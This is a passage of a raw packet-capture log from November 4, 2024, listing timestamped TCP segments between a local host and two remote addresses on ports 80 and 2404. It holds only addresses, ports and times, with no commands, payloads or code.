                                      Nov 4, 2024 09:27:32.404263020 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404273033 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404283047 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404299974 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404448986 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404459953 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404470921 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404481888 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404481888 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404505014 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404531002 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404624939 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404685974 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404697895 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404716969 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404743910 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404814005 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404824972 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404835939 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404855013 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404882908 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.404938936 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404987097 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.404998064 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405018091 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.405044079 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.405129910 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405139923 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405154943 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.405177116 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.405201912 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.405249119 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:37.832797050 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.832823992 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.832871914 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.833606005 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.833636045 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.833647013 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.833647966 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.833672047 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.833749056 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.833760023 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.833770990 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.833789110 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.834564924 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.834588051 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.834599018 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.834610939 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.834629059 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.027558088 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.331003904 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.884593010 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884612083 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884628057 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884641886 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884689093 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884747028 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884756088 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884835958 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.884835958 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.884895086 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884907007 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884917021 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884927988 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884983063 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.884983063 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885113001 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885123968 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885133982 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885144949 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885154963 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885164022 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885174036 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885181904 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885181904 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885188103 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885199070 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885238886 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885437965 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885448933 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885461092 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885472059 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885509014 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885509014 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885535002 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885546923 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885560036 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885571003 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885581017 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885591984 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885596991 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885602951 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885615110 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885624886 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885629892 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885629892 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885654926 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886171103 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886182070 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886190891 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886202097 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886213064 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886224031 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886224985 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886224985 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886235952 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886248112 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886259079 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886270046 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886270046 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886270046 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886281967 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886291981 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886303902 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886315107 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886317968 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886328936 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886368990 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886368990 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886785030 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886833906 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886845112 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886898994 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886974096 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.887007952 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.887037992 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.887037992 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.887121916 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.887212992 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.887638092 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.889769077 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.889817953 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.889827967 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.889904022 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.889947891 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.889960051 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.889969110 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.889980078 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.890007019 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.890029907 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.890181065 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.890240908 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.890252113 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.890264034 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.890289068 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.890376091 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.890388012 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.890397072 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.890408993 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.890434980 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.890465975 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.890528917 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891236067 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891252041 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891262054 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891273022 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.891295910 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.891360044 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891371012 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891381025 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891446114 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.891510010 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891520977 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891558886 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.892213106 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.892251968 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.892263889 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.892302036 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.892302036 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.892349005 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.892359018 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.892445087 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.892445087 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.892457962 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.892469883 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.892499924 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.893145084 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.893192053 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.893194914 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.893203974 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.893239975 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.893337011 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.893347979 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.893358946 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.893369913 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.893394947 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.893419027 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.893423080 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.894172907 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.894224882 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.894237995 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.894239902 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.894269943 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.894304991 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.894328117 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.894339085 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.894390106 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.894414902 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.894428015 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.894460917 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.895102978 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.895145893 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.895155907 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.895157099 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.895215988 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.895241022 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.895252943 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.895263910 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.895328045 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.895338058 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.895349026 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.895390034 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.896187067 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.896198034 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.896209002 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.896246910 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.896250963 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.896250963 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.896358967 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.896369934 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.896379948 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.896389961 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.896414042 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.896452904 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.897070885 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.897114038 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.897123098 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.897125006 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.897169113 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.897172928 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.897520065 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.897557020 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.897564888 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.897569895 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.897613049 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.897694111 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.897706032 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.897716999 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.897730112 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.897753000 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.897792101 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.897809982 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.898519039 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.898538113 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.898574114 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.898775101 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.898787022 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.898799896 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.898830891 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.898855925 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.898888111 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.898901939 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.898914099 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.898997068 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.899538994 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.899565935 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.899576902 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.899590969 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.899625063 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.899652958 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.899666071 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.899704933 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.899763107 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.899775982 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.899787903 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.899827957 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.900477886 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.900520086 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.900532007 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.900542974 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.900614977 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.900616884 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.900629044 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.900640011 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.900736094 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.901195049 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.901245117 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.901268959 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.901458979 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.901520014 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.901532888 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.901559114 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.901559114 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.901587009 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.901598930 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.901608944 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.901622057 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.901635885 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.901669025 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.901701927 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.902432919 CET240449711162.251.122.106192.168.2.8
Nov 4, 2024 09:27:38.902445078 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.902455091 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.902479887 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.902503967 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.902503967 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.902570963 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.902582884 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.902657986 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.903156042 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.903208017 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.903212070 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.903224945 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.903307915 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.903322935 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.903335094 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.903347015 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.903358936 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.903384924 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.903398037 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.903428078 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904095888 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904139042 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904150963 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904156923 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.904181004 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904195070 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.904244900 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904294968 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904305935 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904314995 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.904395103 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904407978 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904412985 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.904421091 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904546022 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904551029 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.904599905 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904613018 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904620886 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.904644012 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904660940 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.904696941 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904709101 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904767036 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.904798985 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904813051 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904829979 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904875994 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.904875994 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.904948950 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904961109 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904973984 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.904984951 CET  2404  49711  162.251.122.106  192.168.2.8
Nov 4, 2024 09:27:38.905005932 CET  49711  2404  192.168.2.8  162.251.122.106
Nov 4, 2024 09:27:38.905019999 CET  49711  2404  192.168.2.8  162.251.122.106
